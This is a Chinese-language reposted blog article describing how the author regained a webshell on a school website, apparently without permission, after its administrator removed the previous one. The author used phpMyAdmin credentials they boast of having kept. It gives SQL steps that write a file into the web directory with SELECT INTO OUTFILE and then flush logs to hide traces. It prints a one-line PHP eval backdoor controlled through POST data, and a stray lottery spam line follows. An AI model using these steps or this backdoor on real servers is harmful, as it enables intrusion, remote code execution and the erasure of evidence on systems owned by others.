當前位置:網際電腦 > 文章中心 > 網絡技術 > 黑客防線 >利用phpMyAdmin拿webshell 投稿指南

利用phpMyAdmin拿webshell

利用phpMyAdmin拿webshell

轉自:Joyuan's Blog


某個學校網站的shell被管理員del了,只好重新弄。
這次是利用phpMyAdmin(哈哈,帳號密碼我記下了!)

首先:
create database joyuan; /* 建立數據庫joyuan */
use joyuan; /* 連接joyuan數據庫 */
create table shell(code text); /* 建立表shell字段code文本型數據text */

然后:
insert into shell(code) /* 插入數據到shell表中的code字段 */
values ('shell代碼'); /* 值為shell代碼 我用PHP一句話,看后面*/
select * into outfile '/home/www/htdocs/server.php' from shell;
/* 將shell表中的內容輸出保存為文件(輸出到web目錄下,要不就無法訪問shell了,可以直接輸出到phpmyadmin目錄下,不知道就phpinfo) */
flush logs /* 刪除日志 */

刪掉剛建的joyuan數據庫,直接刪除或執行SQL命令:drop database joyuan;

利用PHP一句話客戶端(http://linux.chaom.net/Shell.Htm)寫自己的shell

PHP一句話的服務端地址就是:http://xxx/phpmyadmin/server.php

搞定,嘿嘿。

PHP一句話服務端代碼:

<?php eval($_POST[cmd]);?>

類似貼:
phpMyAdmin 后臺拿webshell
http://www.hxhack.com/bbs/read.php?tid-24867-keyword-phpMyAdmin.html

責任編輯:beecoadmin
上一篇:后門程序技術知識全面深解 下一篇:避免觸目驚心的后果 保管好自己的密碼
内蒙古十一选五遗漏号